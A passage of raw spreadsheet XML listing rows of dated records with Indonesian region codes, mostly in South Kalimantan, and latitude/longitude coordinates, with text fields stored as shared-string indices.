      <c r="M2639">
        <v>6303050003</v>
      </c>
      <c r="N2639">
        <v>6303050</v>
      </c>
      <c r="O2639">
        <v>6303</v>
      </c>
      <c r="P2639">
        <v>63</v>
      </c>
      <c r="Q2639" t="s">
        <v>8925</v>
      </c>
      <c r="R2639" t="s">
        <v>8759</v>
      </c>
      <c r="S2639" t="s">
        <v>8751</v>
      </c>
      <c r="T2639" t="s">
        <v>6513</v>
      </c>
      <c r="U2639" s="5">
        <v>11488242</v>
      </c>
      <c r="V2639" s="5" t="s">
        <v>16818</v>
      </c>
      <c r="W2639" s="5">
        <v>-341664</v>
      </c>
      <c r="X2639" t="s">
        <v>20558</v>
      </c>
      <c r="Y2639" t="str">
        <f t="shared" si="41"/>
        <v>-3.41664,114.88242</v>
      </c>
    </row>
    <row r="2640" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2640">
        <v>226301</v>
      </c>
      <c r="B2640" s="1">
        <v>44210</v>
      </c>
      <c r="C2640" s="2">
        <v>0.80923611111111116</v>
      </c>
      <c r="D2640" t="s">
        <v>22</v>
      </c>
      <c r="E2640" t="s">
        <v>23</v>
      </c>
      <c r="F2640" s="3" t="s">
        <v>8926</v>
      </c>
      <c r="H2640" t="s">
        <v>26</v>
      </c>
      <c r="I2640" t="s">
        <v>628</v>
      </c>
      <c r="J2640" t="s">
        <v>6509</v>
      </c>
      <c r="L2640" t="s">
        <v>8927</v>
      </c>
      <c r="M2640">
        <v>6303040001</v>
      </c>
      <c r="N2640">
        <v>6303040</v>
      </c>
      <c r="O2640">
        <v>6303</v>
      </c>
      <c r="P2640">
        <v>63</v>
      </c>
      <c r="Q2640" t="s">
        <v>8808</v>
      </c>
      <c r="R2640" t="s">
        <v>8809</v>
      </c>
      <c r="S2640" t="s">
        <v>8751</v>
      </c>
      <c r="T2640" t="s">
        <v>6513</v>
      </c>
      <c r="U2640" s="5">
        <v>11467893</v>
      </c>
      <c r="V2640" s="5" t="s">
        <v>16819</v>
      </c>
      <c r="W2640" s="5">
        <v>-332192</v>
      </c>
      <c r="X2640" t="s">
        <v>20559</v>
      </c>
      <c r="Y2640" t="str">
        <f t="shared" si="41"/>
        <v>-3.32192,114.67893</v>
      </c>
    </row>
    <row r="2641" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2641">
        <v>226302</v>
      </c>
      <c r="B2641" s="1">
        <v>44211</v>
      </c>
      <c r="C2641" s="2">
        <v>3.8738425925925926E-2</v>
      </c>
      <c r="D2641" t="s">
        <v>22</v>
      </c>
      <c r="E2641" t="s">
        <v>23</v>
      </c>
      <c r="F2641" t="s">
        <v>8928</v>
      </c>
      <c r="G2641" t="s">
        <v>8929</v>
      </c>
      <c r="H2641" t="s">
        <v>26</v>
      </c>
      <c r="I2641" t="s">
        <v>290</v>
      </c>
      <c r="J2641" t="s">
        <v>6509</v>
      </c>
      <c r="L2641" t="s">
        <v>8930</v>
      </c>
      <c r="M2641">
        <v>6304060007</v>
      </c>
      <c r="N2641">
        <v>6304060</v>
      </c>
      <c r="O2641">
        <v>6304</v>
      </c>
      <c r="P2641">
        <v>63</v>
      </c>
      <c r="Q2641" t="s">
        <v>8849</v>
      </c>
      <c r="R2641" t="s">
        <v>8850</v>
      </c>
      <c r="S2641" t="s">
        <v>8851</v>
      </c>
      <c r="T2641" t="s">
        <v>6513</v>
      </c>
      <c r="U2641" s="5">
        <v>11461684</v>
      </c>
      <c r="V2641" s="5" t="s">
        <v>16820</v>
      </c>
      <c r="W2641" s="5">
        <v>-325019</v>
      </c>
      <c r="X2641" t="s">
        <v>20560</v>
      </c>
      <c r="Y2641" t="str">
        <f t="shared" si="41"/>
        <v>-3.25019,114.61684</v>
      </c>
    </row>
    <row r="2642" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2642">
        <v>226303</v>
      </c>
      <c r="B2642" s="1">
        <v>44211</v>
      </c>
      <c r="C2642" s="2">
        <v>0.14869212962962963</v>
      </c>
      <c r="D2642" t="s">
        <v>22</v>
      </c>
      <c r="E2642" t="s">
        <v>23</v>
      </c>
      <c r="F2642" t="s">
        <v>8931</v>
      </c>
      <c r="H2642" t="s">
        <v>26</v>
      </c>
      <c r="I2642" t="s">
        <v>3577</v>
      </c>
      <c r="J2642" t="s">
        <v>6509</v>
      </c>
      <c r="L2642" t="s">
        <v>8932</v>
      </c>
      <c r="M2642">
        <v>6311050014</v>
      </c>
      <c r="N2642">
        <v>6311050</v>
      </c>
      <c r="O2642">
        <v>6311</v>
      </c>
      <c r="P2642">
        <v>63</v>
      </c>
      <c r="Q2642" t="s">
        <v>8933</v>
      </c>
      <c r="R2642" t="s">
        <v>8896</v>
      </c>
      <c r="S2642" t="s">
        <v>8934</v>
      </c>
      <c r="T2642" t="s">
        <v>6513</v>
      </c>
      <c r="U2642" s="5">
        <v>11554561</v>
      </c>
      <c r="V2642" s="5" t="s">
        <v>16821</v>
      </c>
      <c r="W2642" s="5">
        <v>-228158</v>
      </c>
      <c r="X2642" t="s">
        <v>20561</v>
      </c>
      <c r="Y2642" t="str">
        <f t="shared" si="41"/>
        <v>-2.28158,115.54561</v>
      </c>
    </row>
    <row r="2643" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2643">
        <v>226304</v>
      </c>
      <c r="B2643" s="1">
        <v>44211</v>
      </c>
      <c r="C2643" s="2">
        <v>0.17607638888888888</v>
      </c>
      <c r="D2643" t="s">
        <v>22</v>
      </c>
      <c r="E2643" t="s">
        <v>23</v>
      </c>
      <c r="F2643" s="3" t="s">
        <v>8935</v>
      </c>
      <c r="H2643" t="s">
        <v>26</v>
      </c>
      <c r="I2643" t="s">
        <v>137</v>
      </c>
      <c r="J2643" t="s">
        <v>6509</v>
      </c>
      <c r="L2643" t="s">
        <v>8936</v>
      </c>
      <c r="M2643">
        <v>6301040013</v>
      </c>
      <c r="N2643">
        <v>6301040</v>
      </c>
      <c r="O2643">
        <v>6301</v>
      </c>
      <c r="P2643">
        <v>63</v>
      </c>
      <c r="Q2643" t="s">
        <v>8937</v>
      </c>
      <c r="R2643" t="s">
        <v>8722</v>
      </c>
      <c r="S2643" t="s">
        <v>7537</v>
      </c>
      <c r="T2643" t="s">
        <v>6513</v>
      </c>
      <c r="U2643" s="5">
        <v>11472896</v>
      </c>
      <c r="V2643" s="5" t="s">
        <v>16822</v>
      </c>
      <c r="W2643" s="5">
        <v>-356943</v>
      </c>
      <c r="X2643" t="s">
        <v>20562</v>
      </c>
      <c r="Y2643" t="str">
        <f t="shared" si="41"/>
        <v>-3.56943,114.72896</v>
      </c>
    </row>
    <row r="2644" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2644">
        <v>226305</v>
      </c>
      <c r="B2644" s="1">
        <v>44211</v>
      </c>
      <c r="C2644" s="2">
        <v>0.18106481481481482</v>
      </c>
      <c r="D2644" t="s">
        <v>22</v>
      </c>
      <c r="E2644" t="s">
        <v>23</v>
      </c>
      <c r="F2644" t="s">
        <v>8938</v>
      </c>
      <c r="H2644" t="s">
        <v>26</v>
      </c>
      <c r="I2644" t="s">
        <v>137</v>
      </c>
      <c r="J2644" t="s">
        <v>6509</v>
      </c>
      <c r="L2644" t="s">
        <v>8939</v>
      </c>
      <c r="M2644">
        <v>6371020003</v>
      </c>
      <c r="N2644">
        <v>6371020</v>
      </c>
      <c r="O2644">
        <v>6371</v>
      </c>
      <c r="P2644">
        <v>63</v>
      </c>
      <c r="Q2644" t="s">
        <v>8940</v>
      </c>
      <c r="R2644" t="s">
        <v>8795</v>
      </c>
      <c r="S2644" t="s">
        <v>6512</v>
      </c>
      <c r="T2644" t="s">
        <v>6513</v>
      </c>
      <c r="U2644" s="5">
        <v>11461606</v>
      </c>
      <c r="V2644" s="5" t="s">
        <v>16823</v>
      </c>
      <c r="W2644" s="5">
        <v>-332979</v>
      </c>
      <c r="X2644" t="s">
        <v>20563</v>
      </c>
      <c r="Y2644" t="str">
        <f t="shared" si="41"/>
        <v>-3.32979,114.61606</v>
      </c>
    </row>
    <row r="2645" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2645">
        <v>226306</v>
      </c>
      <c r="B2645" s="1">
        <v>44211</v>
      </c>
      <c r="C2645" s="2">
        <v>0.18980324074074073</v>
      </c>
      <c r="D2645" t="s">
        <v>22</v>
      </c>
      <c r="E2645" t="s">
        <v>23</v>
      </c>
      <c r="F2645" t="s">
        <v>8941</v>
      </c>
      <c r="G2645" t="s">
        <v>8942</v>
      </c>
      <c r="H2645" t="s">
        <v>26</v>
      </c>
      <c r="I2645" t="s">
        <v>367</v>
      </c>
      <c r="J2645" t="s">
        <v>6509</v>
      </c>
      <c r="L2645" t="s">
        <v>8943</v>
      </c>
      <c r="M2645">
        <v>6303020008</v>
      </c>
      <c r="N2645">
        <v>6303020</v>
      </c>
      <c r="O2645">
        <v>6303</v>
      </c>
      <c r="P2645">
        <v>63</v>
      </c>
      <c r="Q2645" t="s">
        <v>8944</v>
      </c>
      <c r="R2645" t="s">
        <v>8875</v>
      </c>
      <c r="S2645" t="s">
        <v>8751</v>
      </c>
      <c r="T2645" t="s">
        <v>6513</v>
      </c>
      <c r="U2645" s="5">
        <v>11465231</v>
      </c>
      <c r="V2645" s="5" t="s">
        <v>16824</v>
      </c>
      <c r="W2645" s="5">
        <v>-341646</v>
      </c>
      <c r="X2645" t="s">
        <v>20564</v>
      </c>
      <c r="Y2645" t="str">
        <f t="shared" si="41"/>
        <v>-3.41646,114.65231</v>
      </c>
    </row>
    <row r="2646" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2646">
        <v>226307</v>
      </c>
      <c r="B2646" s="1">
        <v>44211</v>
      </c>
      <c r="C2646" s="2">
        <v>0.19472222222222224</v>
      </c>
      <c r="D2646" t="s">
        <v>22</v>
      </c>
      <c r="E2646" t="s">
        <v>23</v>
      </c>
      <c r="F2646" t="s">
        <v>8945</v>
      </c>
      <c r="G2646" t="s">
        <v>8946</v>
      </c>
      <c r="H2646" t="s">
        <v>26</v>
      </c>
      <c r="I2646" t="s">
        <v>8947</v>
      </c>
      <c r="J2646" t="s">
        <v>6509</v>
      </c>
      <c r="L2646" t="s">
        <v>8948</v>
      </c>
      <c r="M2646">
        <v>6307050007</v>
      </c>
      <c r="N2646">
        <v>6307050</v>
      </c>
      <c r="O2646">
        <v>6307</v>
      </c>
      <c r="P2646">
        <v>63</v>
      </c>
      <c r="Q2646" t="s">
        <v>8823</v>
      </c>
      <c r="R2646" t="s">
        <v>8817</v>
      </c>
      <c r="S2646" t="s">
        <v>8818</v>
      </c>
      <c r="T2646" t="s">
        <v>6513</v>
      </c>
      <c r="U2646" s="5">
        <v>11538419</v>
      </c>
      <c r="V2646" s="5" t="s">
        <v>16825</v>
      </c>
      <c r="W2646" s="5">
        <v>-258412</v>
      </c>
      <c r="X2646" t="s">
        <v>20565</v>
      </c>
      <c r="Y2646" t="str">
        <f t="shared" si="41"/>
        <v>-2.58412,115.38419</v>
      </c>
    </row>
    <row r="2647" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2647">
        <v>226308</v>
      </c>
      <c r="B2647" s="1">
        <v>44211</v>
      </c>
      <c r="C2647" s="2">
        <v>0.26361111111111113</v>
      </c>
      <c r="D2647" t="s">
        <v>22</v>
      </c>
      <c r="E2647" t="s">
        <v>23</v>
      </c>
      <c r="F2647" t="s">
        <v>8949</v>
      </c>
      <c r="H2647" t="s">
        <v>26</v>
      </c>
      <c r="I2647" t="s">
        <v>4433</v>
      </c>
      <c r="J2647" t="s">
        <v>6509</v>
      </c>
      <c r="L2647" t="s">
        <v>8950</v>
      </c>
      <c r="M2647">
        <v>6304060007</v>
      </c>
      <c r="N2647">
        <v>6304060</v>
      </c>
      <c r="O2647">
        <v>6304</v>
      </c>
      <c r="P2647">
        <v>63</v>
      </c>
      <c r="Q2647" t="s">
        <v>8849</v>
      </c>
      <c r="R2647" t="s">
        <v>8850</v>
      </c>
      <c r="S2647" t="s">
        <v>8851</v>
      </c>
      <c r="T2647" t="s">
        <v>6513</v>
      </c>
      <c r="U2647" s="5">
        <v>11460994</v>
      </c>
      <c r="V2647" s="5" t="s">
        <v>16826</v>
      </c>
      <c r="W2647" s="5">
        <v>-326342</v>
      </c>
      <c r="X2647" t="s">
        <v>20566</v>
      </c>
      <c r="Y2647" t="str">
        <f t="shared" si="41"/>
        <v>-3.26342,114.60994</v>
      </c>
    </row>
    <row r="2648" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2648">
        <v>226309</v>
      </c>
      <c r="B2648" s="1">
        <v>44211</v>
      </c>
      <c r="C2648" s="2">
        <v>0.2674421296296296</v>
      </c>
      <c r="D2648" t="s">
        <v>22</v>
      </c>
      <c r="E2648" t="s">
        <v>23</v>
      </c>
      <c r="F2648" t="s">
        <v>8951</v>
      </c>
      <c r="G2648" t="s">
        <v>8952</v>
      </c>
      <c r="H2648" t="s">
        <v>26</v>
      </c>
      <c r="I2648" t="s">
        <v>497</v>
      </c>
      <c r="J2648" t="s">
        <v>6509</v>
      </c>
      <c r="L2648" t="s">
        <v>8953</v>
      </c>
      <c r="M2648">
        <v>6303040001</v>
      </c>
      <c r="N2648">
        <v>6303040</v>
      </c>
      <c r="O2648">
        <v>6303</v>
      </c>
      <c r="P2648">
        <v>63</v>
      </c>
      <c r="Q2648" t="s">
        <v>8808</v>
      </c>
      <c r="R2648" t="s">
        <v>8809</v>
      </c>
      <c r="S2648" t="s">
        <v>8751</v>
      </c>
      <c r="T2648" t="s">
        <v>6513</v>
      </c>
      <c r="U2648" s="5">
        <v>11464233</v>
      </c>
      <c r="V2648" s="5" t="s">
        <v>16827</v>
      </c>
      <c r="W2648" s="5">
        <v>-331524</v>
      </c>
      <c r="X2648" t="s">
        <v>20567</v>
      </c>
      <c r="Y2648" t="str">
        <f t="shared" si="41"/>
        <v>-3.31524,114.64233</v>
      </c>
    </row>
    <row r="2649" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2649">
        <v>226310</v>
      </c>
      <c r="B2649" s="1">
        <v>44211</v>
      </c>
      <c r="C2649" s="2">
        <v>0.29545138888888889</v>
      </c>
      <c r="D2649" t="s">
        <v>22</v>
      </c>
      <c r="E2649" t="s">
        <v>23</v>
      </c>
      <c r="F2649" t="s">
        <v>8954</v>
      </c>
      <c r="G2649" t="s">
        <v>8955</v>
      </c>
      <c r="H2649" t="s">
        <v>26</v>
      </c>
      <c r="I2649" t="s">
        <v>8956</v>
      </c>
      <c r="J2649" t="s">
        <v>6509</v>
      </c>
      <c r="L2649" t="s">
        <v>8957</v>
      </c>
      <c r="M2649">
        <v>6307050025</v>
      </c>
      <c r="N2649">
        <v>6307050</v>
      </c>
      <c r="O2649">
        <v>6307</v>
      </c>
      <c r="P2649">
        <v>63</v>
      </c>
      <c r="Q2649" t="s">
        <v>8958</v>
      </c>
      <c r="R2649" t="s">
        <v>8817</v>
      </c>
      <c r="S2649" t="s">
        <v>8818</v>
      </c>
      <c r="T2649" t="s">
        <v>6513</v>
      </c>
      <c r="U2649" s="5">
        <v>11538883</v>
      </c>
      <c r="V2649" s="5" t="s">
        <v>16828</v>
      </c>
      <c r="W2649" s="5">
        <v>-256666</v>
      </c>
      <c r="X2649" t="s">
        <v>20568</v>
      </c>
      <c r="Y2649" t="str">
        <f t="shared" si="41"/>
        <v>-2.56666,115.38883</v>
      </c>
    </row>
    <row r="2650" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2650">
        <v>226311</v>
      </c>
      <c r="B2650" s="1">
        <v>44211</v>
      </c>
      <c r="C2650" s="2">
        <v>0.30304398148148148</v>
      </c>
      <c r="D2650" t="s">
        <v>22</v>
      </c>
      <c r="E2650" t="s">
        <v>23</v>
      </c>
      <c r="F2650" t="s">
        <v>8959</v>
      </c>
      <c r="H2650" t="s">
        <v>26</v>
      </c>
      <c r="I2650" t="s">
        <v>137</v>
      </c>
      <c r="J2650" t="s">
        <v>6509</v>
      </c>
      <c r="L2650" t="s">
        <v>8960</v>
      </c>
      <c r="M2650">
        <v>6371010014</v>
      </c>
      <c r="N2650">
        <v>6371010</v>
      </c>
      <c r="O2650">
        <v>6371</v>
      </c>
      <c r="P2650">
        <v>63</v>
      </c>
      <c r="Q2650" t="s">
        <v>8961</v>
      </c>
      <c r="R2650" t="s">
        <v>6511</v>
      </c>
      <c r="S2650" t="s">
        <v>6512</v>
      </c>
      <c r="T2650" t="s">
        <v>6513</v>
      </c>
      <c r="U2650" s="5">
        <v>11457897</v>
      </c>
      <c r="V2650" s="5" t="s">
        <v>16829</v>
      </c>
      <c r="W2650" s="5">
        <v>-335113</v>
      </c>
      <c r="X2650" t="s">
        <v>20569</v>
      </c>
      <c r="Y2650" t="str">
        <f t="shared" si="41"/>
        <v>-3.35113,114.57897</v>
      </c>
    </row>
    <row r="2651" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2651">
        <v>226312</v>
      </c>
      <c r="B2651" s="1">
        <v>44211</v>
      </c>
      <c r="C2651" s="2">
        <v>0.30596064814814816</v>
      </c>
      <c r="D2651" t="s">
        <v>22</v>
      </c>
      <c r="E2651" t="s">
        <v>23</v>
      </c>
      <c r="F2651" t="s">
        <v>8962</v>
      </c>
      <c r="G2651" t="s">
        <v>8963</v>
      </c>
      <c r="H2651" t="s">
        <v>26</v>
      </c>
      <c r="I2651" t="s">
        <v>1651</v>
      </c>
      <c r="J2651" t="s">
        <v>6509</v>
      </c>
      <c r="L2651" t="s">
        <v>8964</v>
      </c>
      <c r="M2651">
        <v>6371020005</v>
      </c>
      <c r="N2651">
        <v>6371020</v>
      </c>
      <c r="O2651">
        <v>6371</v>
      </c>
      <c r="P2651">
        <v>63</v>
      </c>
      <c r="Q2651" t="s">
        <v>8965</v>
      </c>
      <c r="R2651" t="s">
        <v>8795</v>
      </c>
      <c r="S2651" t="s">
        <v>6512</v>
      </c>
      <c r="T2651" t="s">
        <v>6513</v>
      </c>
      <c r="U2651" s="5">
        <v>11461731</v>
      </c>
      <c r="V2651" s="5" t="s">
        <v>16830</v>
      </c>
      <c r="W2651" s="5">
        <v>-332373</v>
      </c>
      <c r="X2651" t="s">
        <v>20570</v>
      </c>
      <c r="Y2651" t="str">
        <f t="shared" si="41"/>
        <v>-3.32373,114.61731</v>
      </c>
    </row>
    <row r="2652" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2652">
        <v>226313</v>
      </c>
      <c r="B2652" s="1">
        <v>44211</v>
      </c>
      <c r="C2652" s="2">
        <v>0.3094675925925926</v>
      </c>
      <c r="D2652" t="s">
        <v>22</v>
      </c>
      <c r="E2652" t="s">
        <v>23</v>
      </c>
      <c r="F2652" t="s">
        <v>8966</v>
      </c>
      <c r="H2652" t="s">
        <v>26</v>
      </c>
      <c r="I2652" t="s">
        <v>1263</v>
      </c>
      <c r="J2652" t="s">
        <v>6509</v>
      </c>
      <c r="L2652" t="s">
        <v>8967</v>
      </c>
      <c r="M2652">
        <v>6309080016</v>
      </c>
      <c r="N2652">
        <v>6309080</v>
      </c>
      <c r="O2652">
        <v>6309</v>
      </c>
      <c r="P2652">
        <v>63</v>
      </c>
      <c r="Q2652" t="s">
        <v>8968</v>
      </c>
      <c r="R2652" t="s">
        <v>8969</v>
      </c>
      <c r="S2652" t="s">
        <v>8897</v>
      </c>
      <c r="T2652" t="s">
        <v>6513</v>
      </c>
      <c r="U2652" s="5">
        <v>11546873</v>
      </c>
      <c r="V2652" s="5" t="s">
        <v>16831</v>
      </c>
      <c r="W2652" s="5">
        <v>-203998</v>
      </c>
      <c r="X2652" t="s">
        <v>20571</v>
      </c>
      <c r="Y2652" t="str">
        <f t="shared" si="41"/>
        <v>-2.03998,115.46873</v>
      </c>
    </row>
    <row r="2653" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2653">
        <v>226314</v>
      </c>
      <c r="B2653" s="1">
        <v>44211</v>
      </c>
      <c r="C2653" s="2">
        <v>0.31019675925925927</v>
      </c>
      <c r="D2653" t="s">
        <v>22</v>
      </c>
      <c r="E2653" t="s">
        <v>23</v>
      </c>
      <c r="F2653" t="s">
        <v>8970</v>
      </c>
      <c r="G2653" t="s">
        <v>8971</v>
      </c>
      <c r="H2653" t="s">
        <v>26</v>
      </c>
      <c r="I2653" t="s">
        <v>27</v>
      </c>
      <c r="J2653" t="s">
        <v>6509</v>
      </c>
      <c r="L2653" t="s">
        <v>8972</v>
      </c>
      <c r="M2653">
        <v>6371020014</v>
      </c>
      <c r="N2653">
        <v>6371020</v>
      </c>
      <c r="O2653">
        <v>6371</v>
      </c>
      <c r="P2653">
        <v>63</v>
      </c>
      <c r="Q2653" t="s">
        <v>8973</v>
      </c>
      <c r="R2653" t="s">
        <v>8795</v>
      </c>
      <c r="S2653" t="s">
        <v>6512</v>
      </c>
      <c r="T2653" t="s">
        <v>6513</v>
      </c>
      <c r="U2653" s="5">
        <v>11462597</v>
      </c>
      <c r="V2653" s="5" t="s">
        <v>16832</v>
      </c>
      <c r="W2653" s="5">
        <v>-333378</v>
      </c>
      <c r="X2653" t="s">
        <v>20572</v>
      </c>
      <c r="Y2653" t="str">
        <f t="shared" si="41"/>
        <v>-3.33378,114.62597</v>
      </c>
    </row>
    <row r="2654" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2654">
        <v>226315</v>
      </c>
      <c r="B2654" s="1">
        <v>44211</v>
      </c>
      <c r="C2654" s="2">
        <v>0.3165162037037037</v>
      </c>
      <c r="D2654" t="s">
        <v>22</v>
      </c>
      <c r="E2654" t="s">
        <v>23</v>
      </c>
      <c r="F2654" t="s">
        <v>8974</v>
      </c>
      <c r="G2654" t="s">
        <v>8975</v>
      </c>
      <c r="H2654" t="s">
        <v>26</v>
      </c>
      <c r="I2654" t="s">
        <v>3062</v>
      </c>
      <c r="J2654" t="s">
        <v>1656</v>
      </c>
      <c r="L2654" t="s">
        <v>8976</v>
      </c>
      <c r="M2654">
        <v>3173080003</v>
      </c>
      <c r="N2654">
        <v>3173080</v>
      </c>
      <c r="O2654">
        <v>3173</v>
      </c>
      <c r="P2654">
        <v>31</v>
      </c>
      <c r="Q2654" t="s">
        <v>157</v>
      </c>
      <c r="R2654" t="s">
        <v>157</v>
      </c>
      <c r="S2654" t="s">
        <v>62</v>
      </c>
      <c r="T2654" t="s">
        <v>33</v>
      </c>
      <c r="U2654" s="5">
        <v>10682717</v>
      </c>
      <c r="V2654" s="5" t="s">
        <v>14477</v>
      </c>
      <c r="W2654" s="5">
        <v>-617539</v>
      </c>
      <c r="X2654" t="s">
        <v>19329</v>
      </c>
      <c r="Y2654" t="str">
        <f t="shared" si="41"/>
        <v>-6.17539,106.82717</v>
      </c>
    </row>
    <row r="2655" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2655">
        <v>226316</v>
      </c>
      <c r="B2655" s="1">
        <v>44211</v>
      </c>
      <c r="C2655" s="2">
        <v>0.32163194444444443</v>
      </c>
      <c r="D2655" t="s">
        <v>22</v>
      </c>
      <c r="E2655" t="s">
        <v>23</v>
      </c>
      <c r="F2655" t="s">
        <v>8977</v>
      </c>
      <c r="G2655" t="s">
        <v>8978</v>
      </c>
      <c r="H2655" t="s">
        <v>26</v>
      </c>
      <c r="I2655" t="s">
        <v>193</v>
      </c>
      <c r="J2655" t="s">
        <v>6509</v>
      </c>
      <c r="L2655" t="s">
        <v>8979</v>
      </c>
      <c r="M2655">
        <v>6303040001</v>
      </c>
      <c r="N2655">
        <v>6303040</v>
      </c>
      <c r="O2655">
        <v>6303</v>
      </c>
      <c r="P2655">
        <v>63</v>
      </c>
      <c r="Q2655" t="s">
        <v>8808</v>
      </c>
      <c r="R2655" t="s">
        <v>8809</v>
      </c>
      <c r="S2655" t="s">
        <v>8751</v>
      </c>
      <c r="T2655" t="s">
        <v>6513</v>
      </c>
      <c r="U2655" s="5">
        <v>11468280</v>
      </c>
      <c r="V2655" s="5" t="s">
        <v>16833</v>
      </c>
      <c r="W2655" s="5">
        <v>-332135</v>
      </c>
      <c r="X2655" t="s">
        <v>20573</v>
      </c>
      <c r="Y2655" t="str">
        <f t="shared" si="41"/>
        <v>-3.32135,114.68280</v>
      </c>
    </row>
    <row r="2656" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2656">
        <v>226317</v>
      </c>
      <c r="B2656" s="1">
        <v>44211</v>
      </c>
      <c r="C2656" s="2">
        <v>0.34098379629629627</v>
      </c>
      <c r="D2656" t="s">
        <v>22</v>
      </c>
      <c r="E2656" t="s">
        <v>23</v>
      </c>
      <c r="F2656" t="s">
        <v>8980</v>
      </c>
      <c r="H2656" t="s">
        <v>26</v>
      </c>
      <c r="I2656" t="s">
        <v>27</v>
      </c>
      <c r="J2656" t="s">
        <v>6509</v>
      </c>
      <c r="L2656" t="s">
        <v>8981</v>
      </c>
      <c r="M2656">
        <v>6371020003</v>
      </c>
      <c r="N2656">
        <v>6371020</v>
      </c>
      <c r="O2656">
        <v>6371</v>
      </c>
      <c r="P2656">
        <v>63</v>
      </c>
      <c r="Q2656" t="s">
        <v>8940</v>
      </c>
      <c r="R2656" t="s">
        <v>8795</v>
      </c>
      <c r="S2656" t="s">
        <v>6512</v>
      </c>
      <c r="T2656" t="s">
        <v>6513</v>
      </c>
      <c r="U2656" s="5">
        <v>11461135</v>
      </c>
      <c r="V2656" s="5" t="s">
        <v>16834</v>
      </c>
      <c r="W2656" s="5">
        <v>-332693</v>
      </c>
      <c r="X2656" t="s">
        <v>20574</v>
      </c>
      <c r="Y2656" t="str">
        <f t="shared" si="41"/>
        <v>-3.32693,114.61135</v>
      </c>
    </row>
    <row r="2657" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2657">
        <v>226318</v>
      </c>
      <c r="B2657" s="1">
        <v>44211</v>
      </c>
      <c r="C2657" s="2">
        <v>0.35097222222222224</v>
      </c>
      <c r="D2657" t="s">
        <v>22</v>
      </c>
      <c r="E2657" t="s">
        <v>23</v>
      </c>
      <c r="F2657" t="s">
        <v>8982</v>
      </c>
      <c r="G2657" t="s">
        <v>8983</v>
      </c>
      <c r="H2657" t="s">
        <v>26</v>
      </c>
      <c r="I2657" t="s">
        <v>137</v>
      </c>
      <c r="J2657" t="s">
        <v>6509</v>
      </c>
      <c r="L2657" t="s">
        <v>8984</v>
      </c>
      <c r="M2657">
        <v>6371010006</v>
      </c>
      <c r="N2657">
        <v>6371010</v>
      </c>
      <c r="O2657">
        <v>6371</v>
      </c>
      <c r="P2657">
        <v>63</v>
      </c>
      <c r="Q2657" t="s">
        <v>8804</v>
      </c>
      <c r="R2657" t="s">
        <v>6511</v>
      </c>
      <c r="S2657" t="s">
        <v>6512</v>
      </c>
      <c r="T2657" t="s">
        <v>6513</v>
      </c>
      <c r="U2657" s="5">
        <v>11461948</v>
      </c>
      <c r="V2657" s="5" t="s">
        <v>16835</v>
      </c>
      <c r="W2657" s="5">
        <v>-334811</v>
      </c>
      <c r="X2657" t="s">
        <v>20575</v>
      </c>
      <c r="Y2657" t="str">
        <f t="shared" si="41"/>
        <v>-3.34811,114.61948</v>
      </c>
    </row>
    <row r="2658" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2658">
        <v>226319</v>
      </c>
      <c r="B2658" s="1">
        <v>44211</v>
      </c>
      <c r="C2658" s="2">
        <v>0.3515625</v>
      </c>
      <c r="D2658" t="s">
        <v>22</v>
      </c>
      <c r="E2658" t="s">
        <v>23</v>
      </c>
      <c r="F2658" t="s">
        <v>8985</v>
      </c>
      <c r="G2658" t="s">
        <v>8986</v>
      </c>
      <c r="H2658" t="s">
        <v>26</v>
      </c>
      <c r="I2658" t="s">
        <v>8987</v>
      </c>
      <c r="J2658" t="s">
        <v>6509</v>
      </c>
      <c r="L2658" t="s">
        <v>8988</v>
      </c>
      <c r="M2658">
        <v>6303020011</v>
      </c>
      <c r="N2658">
        <v>6303020</v>
      </c>
      <c r="O2658">
        <v>6303</v>
      </c>
      <c r="P2658">
        <v>63</v>
      </c>
      <c r="Q2658" t="s">
        <v>8874</v>
      </c>
      <c r="R2658" t="s">
        <v>8875</v>
      </c>
      <c r="S2658" t="s">
        <v>8751</v>
      </c>
      <c r="T2658" t="s">
        <v>6513</v>
      </c>
      <c r="U2658" s="5">
        <v>11466829</v>
      </c>
      <c r="V2658" s="5" t="s">
        <v>16836</v>
      </c>
      <c r="W2658" s="5">
        <v>-340378</v>
      </c>
      <c r="X2658" t="s">
        <v>20576</v>
      </c>
      <c r="Y2658" t="str">
        <f t="shared" si="41"/>
        <v>-3.40378,114.66829</v>
      </c>
    </row>
    <row r="2659" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2659">
        <v>226320</v>
      </c>
      <c r="B2659" s="1">
        <v>44211</v>
      </c>
      <c r="C2659" s="2">
        <v>0.35511574074074076</v>
      </c>
      <c r="D2659" t="s">
        <v>22</v>
      </c>
      <c r="E2659" t="s">
        <v>23</v>
      </c>
      <c r="F2659" t="s">
        <v>8989</v>
      </c>
      <c r="G2659" t="s">
        <v>8990</v>
      </c>
      <c r="H2659" t="s">
        <v>26</v>
      </c>
      <c r="I2659" t="s">
        <v>137</v>
      </c>
      <c r="J2659" t="s">
        <v>6509</v>
      </c>
      <c r="M2659">
        <v>6303031013</v>
      </c>
      <c r="N2659">
        <v>6303031</v>
      </c>
      <c r="O2659">
        <v>6303</v>
      </c>
      <c r="P2659">
        <v>63</v>
      </c>
      <c r="Q2659" t="s">
        <v>8991</v>
      </c>
      <c r="R2659" t="s">
        <v>8992</v>
      </c>
      <c r="S2659" t="s">
        <v>8751</v>
      </c>
      <c r="T2659" t="s">
        <v>6513</v>
      </c>
      <c r="U2659" s="5">
        <v>11460743</v>
      </c>
      <c r="V2659" s="5" t="s">
        <v>16837</v>
      </c>
      <c r="W2659" s="5">
        <v>-337994</v>
